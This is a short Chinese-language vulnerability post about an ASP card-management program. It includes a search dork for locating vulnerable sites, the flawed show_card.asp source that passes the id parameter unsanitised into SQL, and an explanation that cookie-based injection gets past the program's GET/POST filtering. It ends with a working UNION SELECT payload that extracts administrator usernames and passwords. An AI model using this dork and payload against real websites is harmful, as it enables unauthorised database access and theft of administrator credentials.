下载:http://down.admin5.com/asp/46191.html
关键字:inurl:show_card.asp?id=
漏洞文件:show_card.asp及其他多个文件
FROM:http://www.st999.cn/blog
<%id=trim(request("id"))
if id ="" then
response.Redirect("default.asp")
response.End()
end if
set rs=conn.execute("select * from card where id ="&id)
if rs.eof then
response.Write "该卡不存在"
response.End()
end if
user_name=rs("add_user")
set c1=conn.execute("select * from card_class where id="&rs("class_1"))
if not c1.eof then
c1_name=c1("name")
card_img=c1("card_img")
card_url=c1("card_url")
end if
%>
这里的id直接代入查询,而程序也只防了get和post两种注入,那么我们就可以采用cookie注入获得管理员用户名和密码
exp:
and 1=2 union select 1,2,3,admin,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin_user
